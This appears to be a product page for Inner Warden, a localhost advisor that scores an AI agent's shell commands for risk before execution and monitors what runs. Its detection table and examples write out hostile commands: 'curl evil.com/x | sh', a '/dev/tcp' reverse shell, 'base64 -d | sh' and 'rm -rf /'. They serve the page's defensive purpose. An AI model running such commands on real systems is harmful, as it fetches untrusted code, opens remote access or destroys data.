AI Agent Protection

Your AI agent runs commands. We make sure they're safe.

Name: Inner Warden
Author: Inner Warden

AI agents execute commands on your server. Inner Warden checks every command before it runs and warns you if something looks dangerous. Works with OpenClaw, Claude Code, Langchain, CrewAI, n8n, or your own agent.

We never block your agent. We advise. You always know what happened.

Install Inner Warden GitHub

OpenClaw and Inner Warden working together

How it works

The Trusted Advisor model

Before your agent runs a command, it asks Inner Warden first. The command is analyzed against 71 threat detection rules. Your agent gets a risk score and decides what to do. You see everything.

Your agent wants to run a command

Your agent decides it needs to execute something on your server. Before running it, the agent asks Inner Warden if the command is safe.

curl https://example.com/setup.sh | bash

Inner Warden analyzes it

The command is analyzed against 71 threat detection rules covering 9 categories: download-and-execute pipelines, reverse shells, obfuscation, prompt injection, and more. It returns a risk score from 0 to 100.

{ "risk_score": 40, "recommendation": "deny", "signals": ["download_and_execute"] }

Your agent warns you

If the recommendation is "deny" or "review", your agent tells you what the command does and why it's risky. You decide: approve or reject.

Inner Warden keeps watching

Even after a command runs, Inner Warden keeps monitoring. If something flagged as dangerous gets executed, you get a notification immediately.

Three outcomes

What happens when your agent runs a command

Safe command

Risk score below 20. Your agent runs it immediately. No notification needed. Example: systemctl status nginx

Result: command executes normally

Suspicious command

Risk score 20-39. Your agent warns you and asks for approval. Example: chmod +x /tmp/script.sh

Result: you approve or reject

Dangerous command

Risk score 40+. Your agent explains why it's dangerous and suggests alternatives. Example: curl evil.com/x | sh

Result: blocked, or you override and we notify the owner

Detection engine

What Inner Warden catches

Not regex matching. Structural analysis using tree-sitter AST parsing. Obfuscation, encoding, and multi-step attacks are detected by behavior, not pattern.

Threat	Example	Score
Download + execute	`curl evil.com/x \| sh`	+40
Reverse shell	`bash -i >& /dev/tcp/...`	+60
Obfuscated command	`base64 -d \| sh`	+30
Temp dir execution	`/tmp/payload`	+30
Persistence	`crontab, systemctl enable`	+20
Destructive operation	`rm -rf /`	+50
Staged attack	`wget + chmod + execute`	+25 bonus

Setup

Get it running in 3 minutes

Two ways to set it up. Pick whichever fits your situation.

Easiest

Let OpenClaw install everything

Install the Inner Warden skill from ClawHub. When you use it for the first time, it detects that Inner Warden is not installed and walks you through the setup. One conversation, fully guided.

openclaw skills install innerwarden-security

Then just talk to OpenClaw: "check my server security". It handles the rest: installs Inner Warden, enables protection, configures the API.

VirusTotal verdict: "Benign". View on ClawHub

Already have Inner Warden

Enable the protection module

One command. This activates command monitoring, file integrity checks, and the advisor API that OpenClaw connects to automatically.

innerwarden enable openclaw-protection

OpenClaw detects the running instance on localhost:8787 and starts validating commands automatically. No extra configuration needed.

Either way, once connected, OpenClaw checks every command with Inner Warden before executing. No API keys to manage. Everything stays on localhost.

Trust model

We advise. Your agent decides. You always know.

We never block your agent

Inner Warden is an advisor, not a firewall. Your agent keeps full autonomy. We analyze and recommend, we don't intercept.

We always watch

40 eBPF hooks in the kernel track every process, connection, and file access. Even if your agent doesn't ask first, we see what it does.

We always tell you

If your agent ignores a "deny" recommendation and runs the command anyway, you get a Telegram notification with the command, risk score, and why we flagged it.

Not another LLM

The command analysis uses deterministic AST parsing (tree-sitter). It can't be fooled by prompt injection. It's math, not magic.

Any AI agent

One HTTP call. Any agent.

Add one HTTP call before your agent executes a command. Works with any framework: OpenClaw, Langchain, CrewAI, n8n, or custom code.

Before your agent runs a command

# Check if a command is safe
curl -s -X POST http://localhost:8787/api/agent/check-command \
  -H "Content-Type: application/json" \
  -d '{"command": "your-command-here"}'

# Response:
# {
#   "risk_score": 0,
#   "recommendation": "allow",   <- safe to run
#   "signals": []
# }

# If recommendation is "deny" or "review",
# show the user the signals and ask before running.

Python (works with Langchain, CrewAI, or any custom agent)

import requests, subprocess

def safe_execute(command: str) -> str:
    # Ask Inner Warden first
    check = requests.post(
        "http://localhost:8787/api/agent/check-command",
        json={"command": command}
    ).json()

    if check["recommendation"] == "deny":
        return f"Blocked: {check['explanation']}"

    if check["recommendation"] == "review":
        print(f"Warning: {check['explanation']}")
        # Ask user for approval here

    return subprocess.check_output(
        command, shell=True, text=True
    )

n8n (use an HTTP Request node before Execute Command)

Add an HTTP Request node that calls POST http://localhost:8787/api/agent/check-command with the command in the body. Route the output: if recommendation is "allow", proceed to the Execute Command node. Otherwise, send a notification and stop.

The API runs on localhost:8787. No external calls, no API keys for the check itself. If you configured dashboard auth, pass a Bearer token in the header.

Your server defends itself. Your agent stays safe.

Install Inner Warden. Enable the protection module. One API call per command. Full validation for any AI agent. Apache-2.0.

Start protecting Read the docs